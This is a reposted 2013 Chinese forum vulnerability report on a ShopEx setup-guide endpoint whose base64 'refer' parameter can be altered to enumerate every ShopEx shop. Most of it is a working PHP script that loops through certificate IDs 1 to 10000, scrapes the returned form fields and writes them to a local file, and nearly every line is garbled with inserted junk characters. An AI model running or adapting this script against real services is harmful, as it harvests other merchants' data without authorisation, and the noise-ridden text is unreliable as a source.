|
|
简要描述:
# H0 q+ @5 K; \: YShopEx某接口缺陷,可遍历所有网站+ Q7 o7 J0 Z, J8 E% g7 y6 B
详细说明:
5 P! x9 G; f! n% G" K D# }问题出现在shopex 网店使用向导页面 6 |1 k& L% k% e, j% p( O2 {
8 ~2 s- [0 G! T( X
, w6 \& ` D& I$ O
- O9 m# R0 m$ w# r: R# S# K2 zhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=" ^' N( `" K! z. o4 j- Q! }0 ]
% M3 b+ O; e, W z/ P/ P
0 _/ X+ |% m4 r5 ~; H( @8 U: {
: e" ^% F9 s. Q5 s5 wrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
8 d1 ?$ l( t% b3 g- T/ ~1 N0 M; g- [% v9 |' w/ t+ J0 S
) `7 a/ `! S# l& O ~, ?! P
' u' K2 _5 j% ]" [" `5 v- h9 a& b我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
6 G' ]& s% m- c+ M/ x$ P% G- u* q6 I/ f$ H* V1 p8 R
A) r/ ~/ H& l, W5 `9 c
3 k/ Q; y& N/ U# m6 p- w, Y. ?<?php8 v% t: z2 F4 ?0 l& ?
2 l- T2 ?" A6 z: f! U5 s for ($i=1; $i < 10000; $i++) { //遍历0 o& B" H) a& q0 ~ Y
; h# S" M4 {, e9 E; a
ShowshopExD($i);* n' J- g" N% {/ b4 \
5 M* u# j* w T1 e6 f7 L& Q; x
}) o- q; w0 V0 I, `+ `- [& T$ {
. m* d2 U8 U+ ^7 G
function ShowshopExD($cid) {
! x- P( T1 K. [1 N8 U& _2 P1 _4 r
$url='http://guide.ecos.shopex.cn/step2.php';
* E8 v6 e( J5 a- n' _# S7 g$ ` j4 |% E/ D' n# h7 o
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
8 W% ^/ a8 U" Q6 B3 Q7 W, q& ^8 P! R. H8 v( K8 u
$url = $url.'?refer='.$refer;+ x5 v2 R1 V9 E w7 r7 m1 q
/ @- {9 ^9 s' j' W7 o1 u# J $ch = curl_init($url);: |* ^- w5 c9 h8 C5 P( D, S a, a
! Z s& u6 W5 U6 \% M: i8 \ curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 ~0 W7 K9 B9 Y! z1 q+ t; E
7 J L2 p; Y$ R) `& M2 H9 P2 f curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;' A3 C+ t5 n6 o$ ]5 t. J
% m* X8 n# E3 F8 u# Z0 O
$result = curl_exec($ch);
b6 i$ l: G. x6 P5 h
6 r) J& y, \; m5 f! { $result = mb_convert_encoding($result, "gb2312", "UTF-8");
- Z$ k+ i$ K8 q, F; N- d1 {7 l
. ?( X: F% U, X9 v* v% y) |# w2 } if(strpos($result,$refer))
3 ~" l* X; b a
9 B3 X' K. h2 {3 ]" i2 S {
# |: i- ?6 v8 ]! f3 _, i! ?. J) s3 v
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
0 K" H6 i8 K' t, J: s$ p
' K% i$ ?. ^4 v' Z" G7 \1 x preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);$ x8 W% ]# C- N- _
4 h& g$ i* {# l) h: ^0 Q" q0 `7 \ foreach ($value[1] as $key) {6 Y9 r( b1 S( {7 d. r+ b
* B a3 _5 Z) J preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
2 R! m& _/ c+ g3 ]8 S
; r5 ?- ]: H0 Z! E echo $res[1][0].':'.$res[3][0]."\r\n";
! h# d7 d. e3 j
- s S; l6 p8 o% l* e( R $col =$res[1][0].':'.$res[3][0]."\r\n";
. L6 x: P- g3 a1 N- p
" `4 F, i. s6 \' G/ D fwrite($fp, $col, strlen($col));
/ J j4 f! H5 D, N- B9 z
( [ A& s( E4 G; U }$ h( {3 f+ F7 F0 `; u4 n* c. `+ A: g8 P
# X9 ]% m0 }' w+ w* I
echo '--------------------------------'."\r\n";
+ i9 _) }9 G; |/ p" s4 R) N/ S1 E' v$ V" x5 g
fclose($fp); * p" q8 ^ b( @. |' V
/ z9 ?# @& ~4 [
}
+ m; R& `+ R0 p+ l( V0 U' J: O7 E/ X( _3 Y$ u9 Q. c- P
flush();: J+ [5 l; N9 {+ b
0 c# K' \* H1 v" j' k
curl_close($ch);( B- A8 z+ f1 ]
4 p3 N- R8 |' E3 h' ]$ J4 S( }' [ }2 e2 `/ u- {. r' g
1 S& W9 b5 m+ e0 s) R! Y0 X0 w
?>3 y; i, }1 f# [0 _* ^
漏洞证明:
, p5 ~( M2 _0 m% k; O2 h- g0 nhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
1 W2 m& I7 c8 \0 D" S* Prefer换成其他加密方式
7 O* M1 d1 q4 l* i) s2 C8 u% B |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对